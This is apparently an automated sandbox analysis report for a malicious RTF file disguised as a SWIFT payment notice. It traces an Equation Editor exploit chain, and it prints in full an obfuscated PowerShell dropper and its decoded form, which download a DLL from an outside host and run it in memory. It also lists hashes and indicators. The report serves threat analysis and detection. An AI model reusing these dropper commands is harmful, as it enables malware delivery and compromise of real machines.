Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

SWIFT Gide...SD.rtf

windows7-x64

10

SWIFT Gide...SD.rtf

windows10-2004-x64

1

Analysis

  • max time kernel
    102s
  • max time network
    105s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    06/07/2023, 16:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SWIFT Giden mesaj bildirimi - 9.000,00 USD.rtf

  • Size

    131KB

  • MD5

    c4794418f4f9af91ea4a8c222e3bd352

  • SHA1

    48d40ae68eafa9388bb061371982c725a853b52b

  • SHA256

    5a9dba0fc2a6d0a2e9cbac0bc774059d329d36c8308ac05882146a8362374fd5

  • SHA512

    bbcafa4232fd1aaa7665376f7ac5c9af9ce9fe22a71b8f258b501ac7d8590c2ea6fd6914920ae3ed25f230fe0f50153a6d0bc476ddf17819b30d99ab2e707122

  • SSDEEP

    3072:kSYgia6rls1Pnx5rM/WJEZk2skcTpz1Bxnei:+c55rM/629cTpzzUi

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://cryptersandtools.minhacasa.tv/e/e

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

    exploit
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SWIFT Giden mesaj bildirimi - 9.000,00 USD.rtf"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2460
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\qvxtopdy.vbs"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂GM⁂cgB5⁂H⁂⁂d⁂Bl⁂HI⁂cwBh⁂G4⁂Z⁂B0⁂G8⁂bwBs⁂HM⁂LgBt⁂Gk⁂bgBo⁂GE⁂YwBh⁂HM⁂YQ⁂u⁂HQ⁂dg⁂v⁂GU⁂LwBl⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂LgBH⁂GU⁂d⁂BN⁂GU⁂d⁂Bo⁂G8⁂Z⁂⁂o⁂Cc⁂VgBB⁂Ek⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgBw⁂Gk⁂ZgB6⁂HY⁂YgBu⁂C8⁂NQ⁂1⁂C4⁂OQ⁂0⁂C4⁂M⁂⁂x⁂DE⁂Lg⁂5⁂Dc⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3040
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://cryptersandtools.minhacasa.tv/e/e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.pifzvbn/55.94.011.97//:ptth'))"
            4⤵
            • Blocklisted process makes network request
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      57ba604fc545eb792e7458e70b780c4c

      SHA1

      7d6f0f0752635b3ffa9b9df0c6051ce7ae62e3d5

      SHA256

      3c6caa2a3564f34e4e94e936e238a0415a118368b1a3d89b677b1cfab1407520

      SHA512

      795fb5074cd27a2867f9074eb82ba861d80cb5f31822c720e855e0d60c3950017600d2cd7476a17bed065e8f9db403f4cde6771f7bec2fde2197a4946bc83800

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J48LGNR35GNZJU08VV3D.temp
      Filesize

      7KB

      MD5

      6ff41ad727d1fc96b454cfb5b4522cd0

      SHA1

      ac06ae6b8431159b23ec47949e434ccbbaee7ac9

      SHA256

      5c0a8c150d924597162c02d9ef9a819daf1a47497e978d49c6ce9d872200ff21

      SHA512

      758190cb96f9c35ab0bc4badde9636134d4a21b00f904fa0152e686b68ac102b448b329df8685171637b8468d8ab3b233ecfbd8f700ca465e34682980b3d27ba

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      6ff41ad727d1fc96b454cfb5b4522cd0

      SHA1

      ac06ae6b8431159b23ec47949e434ccbbaee7ac9

      SHA256

      5c0a8c150d924597162c02d9ef9a819daf1a47497e978d49c6ce9d872200ff21

      SHA512

      758190cb96f9c35ab0bc4badde9636134d4a21b00f904fa0152e686b68ac102b448b329df8685171637b8468d8ab3b233ecfbd8f700ca465e34682980b3d27ba

      Download Submit

    • C:\Users\Admin\AppData\Roaming\qvxtopdy.vbs
      Filesize

      318KB

      MD5

      a02dd7b8d71b50155cec8eac83c4b569

      SHA1

      5c52fb5ea7a6de6e9a3af86ec663f7c0e1eaf0cd

      SHA256

      419467b65389a1479d15e62e6787248e28db6d7c4bfff778ce66679cb5e90b3f

      SHA512

      73cde8d708030b563731a2a83ada75328a91beb4ba03c2fca57f500d734865e85e08deb04e84bbec48a0f3ad0d08e4908ae335fb16e0c2002def31b6713c0f83

      Download Submit

    • C:\Users\Admin\AppData\Roaming\qvxtopdy.vbs
      Filesize

      318KB

      MD5

      a02dd7b8d71b50155cec8eac83c4b569

      SHA1

      5c52fb5ea7a6de6e9a3af86ec663f7c0e1eaf0cd

      SHA256

      419467b65389a1479d15e62e6787248e28db6d7c4bfff778ce66679cb5e90b3f

      SHA512

      73cde8d708030b563731a2a83ada75328a91beb4ba03c2fca57f500d734865e85e08deb04e84bbec48a0f3ad0d08e4908ae335fb16e0c2002def31b6713c0f83

      Download Submit

    • memory/652-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/652-118-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3040-87-0x0000000002700000-0x0000000002740000-memory.dmp

      Filesize

      256KB

      Download

    • memory/3040-86-0x0000000002700000-0x0000000002740000-memory.dmp

      Filesize

      256KB

      Download